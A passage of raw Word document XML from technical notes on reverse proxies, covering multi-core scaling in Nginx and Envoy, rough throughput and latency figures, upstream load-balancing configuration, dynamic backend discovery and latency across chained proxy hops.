    <w:p w14:paraId="670B07C6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.3 Multi-Core Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D362946" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nginx approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA1CF4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Multiple worker processes (one per core).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77956ACB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Each is fully independent (shared-nothing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2EE9C1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Each worker handles its own set of connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA5C44" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>SO_REUSEPORT: kernel distributes incoming connections across workers evenly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52427DA9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="692"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>No locks, no cross-worker communication for request handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB97E1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Envoy approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125E8AA0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Single process, multiple worker threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF8E794" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Each thread has its own event loop and connection set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD8EF3C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Shared data (configuration, cluster state) uses TLS (Thread-Local Storage) with periodic sync from a main thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E9BCE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Lock-free data structures where possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8BDA7E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Stats are per-thread, aggregated at collection time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F49F780" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.4 Proxy Performance Numbers (Ballpark)</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60"/>
        <w:gridCol w:w="2513"/>
        <w:gridCol w:w="2521"/>
        <w:gridCol w:w="2755"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="38555B7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A8E0A3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Proxy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BE9FDD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>L7 RPS (single core)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07A22B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>L4 connections/sec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E5575D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Typical latency added</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="3E53BA8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A36F93" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Nginx</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FC37D7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>50,000–100,000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F6F9FE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>300,000+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E1324E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>0.5–2ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="76B7E59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284907" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Envoy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8665E9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>30,000–80,000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0089B7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>200,000+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B004E0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>0.5–3ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="0924864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EF67AA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>HAProxy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6892D8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>100,000–200,000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D610C7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>500,000+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4E97DB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>0.2–1ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="5566C39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3F08FC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Traefik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488D2D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>20,000–50,000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5CEB31" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">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B7633C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>1–5ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="626B87E5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>These vary enormously based on: request size, header count, TLS vs. plain, keep-alive vs. new connections, backend latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524953ED" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="797C50E4">
          <v:rect id="_x0000_i3330" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62258EFA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Proxy Load Balancing Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EAEB87" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 The Proxy AS the Load Balancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305A8AA9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>In most modern architectures, the reverse proxy IS the load balancer. Nginx, Envoy, HAProxy — they're all reverse proxies with built-in load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C864F76" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How backend selection works in Nginx:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A32214" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785F4CA7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>upstream backend_pool {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0C9861" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    # Algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3EA8DE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    least_conn;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E10837" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F050F54" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    # Backends with weights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3029F231" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    server 10.0.1.1:8080 weight=3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543D1233" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    server 10.0.1.2:8080 weight=2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0048C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    server 10.0.1.3:8080 weight=1 backup;  # only used if others are down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB366B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11936C42" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    # Connection pooling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FACDB18" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    keepalive 64;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055E0DA0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043D67CE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>On each request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C3F18C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Nginx selects a server from backend_pool using least-connections (weighted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72166C09" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If the selected server fails (connection refused, timeout): tries the next server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613B8FDA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>max_fails=3 + fail_timeout=30s: after 3 failures within 30s, mark server as temporarily unavailable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A7E54" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 Dynamic Backend Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9D3814" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Static configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Backend IPs are in the config file. Adding/removing requires config reload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307D2FC2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DNS-based discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9DECCF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E92980B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>upstream backend {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DFA57B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    server service.consul.local resolve;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DC1E19" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557B8AAF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Nginx resolves the DNS name periodically. When service instances register/deregister from Consul, DNS updates, Nginx picks up new backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F844119" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API-based discovery (Envoy + xDS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC26102" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Envoy receives backend lists dynamically from a control plane via gRPC streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F104632" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Envoy subscribes to EDS (Endpoint Discovery Service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E61B60C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Control plane sends current endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2591A195" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>When a new instance launches (Kubernetes pod start) → control plane pushes update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF0A5F2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Envoy immediately starts routing to the new instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B266E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>No reload, no restart, no config file change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199E2AEC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="31382694">
          <v:rect id="_x0000_i3331" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E154DB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. Proxy Chaining and Request Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56814D71" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.1 Multi-Proxy Request Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3984D9DE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>A real production request may traverse MANY proxies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A6F01E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775679E6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client → CDN Edge Proxy → Regional Load Balancer → API Gateway → Sidecar Proxy → Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8F65F0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                                                                         ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57468BEA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                                                              [Application makes call to Service B]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48728725" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                                                                         ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB768EF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                                                                  Sidecar Proxy → Service B's Sidecar → Service B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53419880" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Total proxy hops: 6+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1684541F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Latency accumulation:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Each proxy adds 0.5–2ms. Six hops = 3–12ms of pure proxy overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9BF922" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
